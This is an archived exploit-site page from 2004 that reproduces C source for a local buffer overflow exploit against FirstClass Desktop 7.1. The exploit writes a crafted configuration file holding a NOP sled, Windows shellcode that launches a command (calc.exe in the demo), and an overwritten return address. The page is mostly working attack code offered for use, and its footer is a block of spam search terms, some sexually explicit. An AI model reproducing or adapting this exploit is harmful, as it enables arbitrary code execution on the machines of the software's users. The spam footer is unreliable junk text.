about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , FirstClass Desktop 7.1 (latest) buffer overflow Exploit



2004-04-07 FirstClass Desktop 7.1 (latest) buffer overflow Exploit 
/***********************************************************
++++++++++++++++++++++++++++++++++++++++++++++++++++
####################################################
# FirstClass Desktop 7.1 (latest) buffer overflow exploit #
####################################################
Discovered and coded by I2S-LaB.

URL : http://www.I2S-LaB.com
contact : contact[at]I2S-LaB.com

++++++++++++++++++++++++++++++++++++++++++++++++++++
Compile it with cl.exe (VC++6)
***********************************************************/

#include <windows.h>

void main (int argc, char *argv[])
{

	HANDLE FCP;	
	DWORD NumberOfBytesWritten;
	unsigned char *p, 

	FC_FILE[] = "Local Network.FCP",
	PATH[] = "C:\\Program Files\\FirstClass\\Fcp\\",
			
	rawData[] =

	/////////////////////////////////////////////////////////////////
	// FC file data
	/////////////////////////////////////////////////////////////////
	"\x43\x4F\x4E\x4E\x54\x59\x50\x45\x20\x3D\x20\x38\x0D\x0A\x46\x43"

	"\x50\x45\x4E\x43\x52\x59\x50\x54\x20\x3D\x20\x31\x0D\x0A\x44\x4C"
	"\x53\x45\x4E\x44\x20\x3D\x20\x30\x0D\x0A\x44\x4C\x45\x52\x52\x53"
	"\x20\x3D\x20\x30\x0D\x0A\x44\x4C\x52\x43\x56\x20\x3D\x20\x30\x0D"

	"\x0A\x4D\x44\x4D\x44\x42\x47\x20\x3D\x20\x30\x0D\x0A\x53\x4C\x44"

	"\x42\x47\x20\x3D\x20\x30\x0D\x0A\x54\x43\x50\x54\x58\x57\x49\x4E"

	"\x20\x3D\x20\x31\x30\x30\x30\x30\x0D\x0A\x54\x43\x50\x52\x58\x42"

	"\x55\x46\x20\x3D\x20\x31\x30\x30\x30\x30\x0D\x0A\x54\x43\x50\x52"

	"\x45\x4D\x50\x4F\x52\x54\x20\x3D\x20\x35\x31\x30\x0D\x0A\x50\x52"

	"\x4F\x58\x59\x50\x4F\x52\x54\x20\x3D\x20\x22"
		
	/////////////////////////////////////////////////////////////////
	// MASS NOP LIKE : 'A' = inc ecx
	/////////////////////////////////////////////////////////////////
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	

	/*
	 * Fcclient Specific shellcode [78 bytes]
	 *****************************************************************
			:00401006 EB47 jmp 0040104F
			:00401008 5A pop edx
			:00401009 33FF xor edi, edi
			:0040100B 8BEC mov ebp, esp
			:0040100D 57 push edi
			:0040100E 52 push edx
			:0040100F 57 push edi
			:00401010 6845786563 push 63657845
			:00401015 4F dec edi
			:00401016 81EFFFA89691 sub edi, 9196A8FF
			:0040101C 57 push edi
			:0040101D 68454C3332 push 32334C45
			:00401022 684B45524E push 4E52454B
			:00401027 8D5DE4 lea ebx, dword ptr [ebp-1C]
			:0040102A 53 push ebx
			:0040102B 33FF xor edi, edi
			:0040102D 81EF589D9DFF sub edi, FF9D9D58
			:00401033 FF17 call dword ptr [edi]
			:00401035 8D5DED lea ebx, dword ptr [ebp-13]
			:00401038 53 push ebx
			:00401039 50 push eax
			:0040103A 6681F75103 xor di, 0351
			:0040103F 4F dec edi
			:00401040 FF17 call dword ptr [edi]
			:00401042 6A01 push 00000001
			:00401044 FF75F8 push [ebp-08]
			:00401047 FFD0 call eax
			:00401049 6683EF4C sub di, 004C
			:0040104D FFD7 call edi
			:0040104F E8B4FFFFFF call 00401008
		**********************************************************
			*
		 */

		"\xEB\x47\x5A\x33\xFF\x8B\xEC\x57\x52\x57\x68\x45\x78\x65\x63\x4F"
		"\x81\xEF\xFF\xA8\x96\x91\x57\x68\x45\x4C\x33\x32\x68\x4B\x45\x52"

		"\x4E\x8D\x5D\xE4\x53\x33\xFF\x81\xEF\x58\x9D\x9D\xFF\xFF\x17\x8D"

		"\x5D\xED\x53\x50\x66\x81\xF7\x51\x03\x4F\xFF\x17\x6A\x01\xFF\x75"

		"\xF8\xFF\xD0\x66\x83\xEF\x4C\xFF\xD7\xE8\xB4\xFF\xFF\xFF"
 
		"calc.exe & " // to execute

		////////////////////////////////////////////////////////////////
		// OTHER DATA
		////////////////////////////////////////////////////////////////
		"\x22\x0A\x0D\x0A\x50\x52\x4F\x58\x59\x41\x44\x44\x52\x20" 
		"\x3D\x20\x22\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x45\x45\x45"

		"\x45\x44\x44"

		/////////////////////////////////////////////////////////////////
		// Return Address
		/////////////////////////////////////////////////////////////////
		"\x5f\x75\xC2\x00";

		// Banner
printf ("###############################################\n"
			"FirstClass Client local buffer overflow Exploit\n"
"###############################################\n"
			"Discovered & coded by I2S-LaB.\n\n"
			"URL : http://www.I2S-LaB.com\n"
			"MAIL : Contact[at]I2S-LaB.com\n\n");


		if ( !argv[1]) argv[1] = FC_FILE;

		(argc > 2 ) ? (p = argv[2]) : (p = PATH);

		if ( !(SetCurrentDirectory( p ) ) )
		{
			printf ("cannot set current directory to %s\nexiting.\n",
p);
			ExitProcess(0);
		}

		if (!lstrcmpi (argv[1], "/restore") )
	
			printf ("Restore the backup file...%s\n", 
CopyFile ("Local Network.BAK", FC_FILE, FALSE) ? "ok"
: "Error : backup file not found!\n");

		else if ( !lstrcmpi (argv[1], "/run"))
		{
			printf ("Saving the Local Network file...%s\n", 
	CopyFile (FC_FILE, "Local Network.BAK", TRUE) ? "ok"
: "Backup file cannot be made");


			printf ("Opening the Local Network file...");
				FCP = CreateFile (FC_FILE, GENERIC_WRITE, 
					 FILE_SHARE_WRITE, NULL,
					 OPEN_EXISTING,
					 FILE_ATTRIBUTE_NORMAL,NULL);

			if (FCP == INVALID_HANDLE_VALUE)
			{
			printf ("cannot open Local Network file, exiting!\n");
				ExitProcess (-1);
			}

	printf ("ok\nWriting the Local Network File...%s\n",
WriteFile (FCP, rawData, strlen (rawData) + 1, &NumberOfBytesWritten,
NULL) ? 
"ok" : "Write file error!");
		}

	else printf ("usage : %s /RUN | /RESTORE [path to Local
Network.FCP]\n\n"
	"/RUN : launch the xploit against \"Local
Network.FCP\"\n"
	"/RESTORE : Restore the previous \"Local
Network.FCP\"\n\n"
"[path to Local Network.FCP] : Optional,\ndefine the path of the
\"Local Network.FCP\" to exploit.\n"
	"Default is %s\n", argv[0], PATH);
}
securitydot.net - 2004-04-07

Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 03:01:28 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
vuln scann +powered+b Www.kavyam sex pektsh sexy girl www.zsjhan www.51308. inboy.imgs WAP SEX www sex.co www.sex me www.hnwans mambo Remo six vedio gambar art news/explo Nigar Khan Indiaas Naruto www.kuutv. phpBB por Dancer fucking gi Www.sex 20 Nacked news for c Gambar kar news for c boobs of s P085334 sanian mir www.myeduz white Puss 272840137. www.zazuwa freesexyvi Coppermine search/exp Microsoft wife shari format str Folio+Remo WWW.india windows ex www.taobao Asinsex.ne south actr Rape scene fuck malik 200 /compo